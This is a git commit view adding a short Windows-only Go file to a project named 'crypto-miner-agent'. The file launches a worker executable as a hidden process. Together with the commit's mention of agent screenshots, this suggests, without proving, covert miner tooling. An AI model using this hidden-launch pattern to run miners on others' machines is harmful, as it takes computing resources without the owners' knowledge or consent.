Add fleet groups, agent screenshots, deploy guards, and Crucible polish.
This commit is contained in:
15
agent/client/spawn_windows.go
Normal file
15
agent/client/spawn_windows.go
Normal file
@@ -0,0 +1,15 @@
|
||||
//go:build windows
|
||||
|
||||
package client
|
||||
|
||||
import (
|
||||
"path/filepath"
|
||||
|
||||
"crypto-miner-agent/deploy"
|
||||
)
|
||||
|
||||
func spawnWorker(exe string) error {
|
||||
cmd := deploy.HiddenCommand(exe, "--run")
|
||||
cmd.Dir = filepath.Dir(exe)
|
||||
return cmd.Start()
|
||||
}
|
||||
Reference in New Issue
Block a user